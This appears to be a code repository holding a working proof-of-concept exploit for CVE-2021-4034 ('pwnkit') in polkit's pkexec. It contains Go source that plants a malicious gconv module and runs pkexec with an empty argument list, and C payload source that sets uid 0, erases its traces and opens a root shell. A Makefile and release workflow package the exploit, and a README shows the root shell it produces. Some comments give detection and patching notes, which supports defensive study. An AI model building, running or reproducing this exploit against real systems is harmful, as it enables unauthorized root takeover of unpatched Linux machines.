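├── .github └── workflows │ └── autorelease.yml ├── LICENSE ├── Makefile ├── README.md ├── exploit.go └── payload └── payload.c /.github/workflows/autorelease.yml: --------------------------------------------------------------------------------
name: Release
on:
  push:
    tags: ["v[0-9]+.[0-9]+.[0-9]+"]
    branches: ["master"]

jobs:
  tagged-release:
    name: "Tagged Release"
    if: startsWith( github.ref, 'refs/tags/v')
    runs-on: "ubuntu-latest"
    timeout-minutes: 45
    # Least privilege for GITHUB_TOKEN: creating a release and uploading an
    # asset only needs write access to repository contents. Without this block
    # the token carries the repository's default permission set.
    permissions:
      contents: write

    steps:
      - name: Go 1.17
        uses: actions/setup-go@v2
        with:
          go-version: ^1.17
        id: go

      - name: Check Out Code
        uses: actions/checkout@v2

      - name: Git Fetch Tags
        run: git fetch --prune --unshallow --tags -f

      - name: Make
        run: make

      - name: Release
        # This third-party action receives GITHUB_TOKEN and is referenced by the
        # mutable "latest" tag, so whatever is published under that tag runs with
        # write access here. Pin it to a full commit SHA (and review updates)
        # rather than tracking a moving ref.
        uses: "marvinpinto/action-automatic-releases@latest"
        with:
          repo_token: "${{ secrets.GITHUB_TOKEN }}"
          prerelease: false
          files: |
            ./pwnkit
-------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2022 Daniele Linguaglossa 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software.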
14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /Makefile: --------------------------------------------------------------------------------
# Build order matters: payload.so must exist before `go build` runs, because
# exploit.go embeds it with //go:embed. Both outputs (payload.so, pwnkit) are
# written to the repository root; pwnkit is the file the release workflow uploads.
main:
	gcc payload/payload.c -o payload.so -shared -fPIC
	go build -trimpath -ldflags="-s -w" -o pwnkit exploit.go
-------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # poc-cve-2021-4034 2 | PoC for CVE-2021-4034 dubbed pwnkit 3 | 4 | 5 | ## Compile exploit.go 6 | 7 | `go build -o exploit exploit.go` 8 | 9 | 10 | ## Compile payload.so 11 | 12 | Once compiled put the shared object in the same folder as the exploit binary 13 | 14 | `gcc payload/payload.c -o payload.so -shared -fPIC` 15 | 16 | 17 | ## Enjoy 18 | 19 | ```shell 20 | dzonerzy@DESKTOP-5JHC90H:/mnt/c/Users/DZONERZY/GolangProjects/pkpwn$ ./exploit 21 | Spawning root shell!
22 | # id 23 | uid=0(root) gid=0(root) groups=0(root),4(adm),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),117(netdev),1000(dzonerzy) 24 | ``` 25 | -------------------------------------------------------------------------------- /exploit.go: --------------------------------------------------------------------------------
package main

import (
	_ "embed"
	"fmt"
	"io/ioutil"
	"log"
	"os"
	"path/filepath"
	"strings"
	"syscall"
)

// payload holds the bytes of payload.so, embedded at build time (the Makefile
// compiles payload/payload.c into that file before `go build` runs).
//
//go:embed payload.so
var payload []byte

const (
	fake_charset = "payload" // value handed to the target via the CHARSET environment variable in main
	gconv_dir    = "gconv"   // directory that receives the gconv-modules file
)

var (
	// Template for the gconv-modules file; ${REPLACE} is substituted with the
	// absolute path of the payload.so written by wirte_gconv_module.
	gconv_content = "module PAYLOAD// INTERNAL ../../../../../../../..${REPLACE} 2\nmodule INTERNAL PAYLOAD// ../../../../../../../..${REPLACE} 2"
)

// wirte_gconv_module (sic) creates ./gconv, writes the embedded payload.so into
// the current working directory and writes ./gconv/gconv-modules referencing it.
//
// It returns the error from os.Mkdir or os.Getwd. Note that the result of the
// first ioutil.WriteFile is discarded, and a failure of the second one calls
// log.Fatal instead of being returned, so callers cannot recover from either.
// Every file is created with mode 0o755 (world-readable and executable).
func wirte_gconv_module() (err error) {
	if err := os.Mkdir(gconv_dir, 0o0755); err != nil {
		return err
	}
	directory, err := os.Getwd()
	if err != nil {
		return err
	}
	// The error from this write is ignored; if it fails, gconv-modules below
	// ends up pointing at a file that does not exist.
	ioutil.WriteFile(filepath.Join(directory, "payload.so"), payload, 0o0755)
	replace := filepath.Join(directory, "payload.so")
	content := strings.Replace(gconv_content, "${REPLACE}", replace, -1)
	if err := ioutil.WriteFile(fmt.Sprintf("%s/gconv-modules", gconv_dir), []byte(content), 0o0755); err != nil {
		log.Fatal(err)
	}
	return nil
}

// main stages the files on disk and then replaces this process with
// /usr/bin/pkexec, passing a nil argv and a hand-built environment.
// The artifacts left in the working directory ("gconv/", "GCONV_PATH=./")
// are not cleaned up here; payload.c removes them after it is loaded.
//
// Defender notes: pkexec being started with an empty argument list, and the
// GCONV_PATH / CHARSET entries in its environment, are concrete signals for
// process-auditing rules. Updating polkit to a release that fixes
// CVE-2021-4034 closes the issue; dropping the setuid bit from pkexec was the
// widely published interim workaround.
func main() {
	target := "/usr/bin/pkexec"
	if err := wirte_gconv_module(); err != nil {
		log.Fatal(err)
	}
	// A directory literally named "GCONV_PATH=." containing a file named
	// "gconv" that holds a single NUL byte (mode 0o755).
	if err := os.Mkdir("GCONV_PATH=.", 0o0755); err != nil {
		log.Fatal(err)
	}
	if err := ioutil.WriteFile(fmt.Sprintf("GCONV_PATH=./%s", gconv_dir), []byte("\x00"), 0o0755); err != nil {
		log.Fatal(err)
	}
	// argv is nil, so the target starts with an empty argument list. The
	// environment is built by hand: the first entry is the bare string "gconv"
	// (no '='), PATH names the directory created above, SHELL points at a path
	// that presumably does not exist, and CHARSET carries fake_charset.
	// syscall.Exec only returns on failure.
	if err := syscall.Exec(target, nil, []string{gconv_dir, "PATH=GCONV_PATH=.", "SHELL=/fake/shell", fmt.Sprintf("CHARSET=%s", fake_charset)}); err != nil {
		log.Fatal(err)
	}
}
-------------------------------------------------------------------------------- /payload/payload.c: --------------------------------------------------------------------------------
#include
#include
#include
// build with gcc payload.c -o payload.so -shared -fPIC
// NOTE(review): the header names after the three #include directives above
// were lost when this listing was extracted; the code below calls
// setuid/setgid/execve, setenv/system, and fprintf/perror.

// gconv is an empty exported symbol; by its name it is presumably an entry
// point a gconv module is expected to provide — not verifiable from this file.
void gconv() {}

// gconv_init, by its name, is the routine run when this shared object is loaded
// as a gconv module. It switches to uid/gid 0 (which can only succeed if the
// loading process already holds that privilege, e.g. a setuid-root binary),
// deletes the staging directories created by exploit.go, prints a marker, and
// replaces the process with /bin/sh under a fixed PATH.
//
// Defender note: because the on-disk artifacts are removed here, detection is
// better based on process lineage (pkexec replacing itself with /bin/sh) and the
// "Spawning root shell!" stdout marker than on file-system residue.
void gconv_init() {
	// Return values of setuid/setgid are not checked: if the privilege change
	// fails, execution still continues to the shell with the original ids.
	setuid(0);
	setgid(0);
	setenv("PATH", "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", 1);
	char* argv[] = { "/bin/sh", NULL };
	char* envp[] = { "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", NULL };
	// Remove the "gconv/" and "GCONV_PATH=." directories written by exploit.go,
	// relative to the current working directory.
	system("rm -r gconv");
	system("rm -r \"GCONV_PATH=.\"");
	fprintf(stdout, "Spawning root shell!\n");
	// execve only returns on failure.
	if (execve("/bin/sh", argv, envp) == -1)
		perror("Could not execve :( ");
}
--------------------------------------------------------------------------------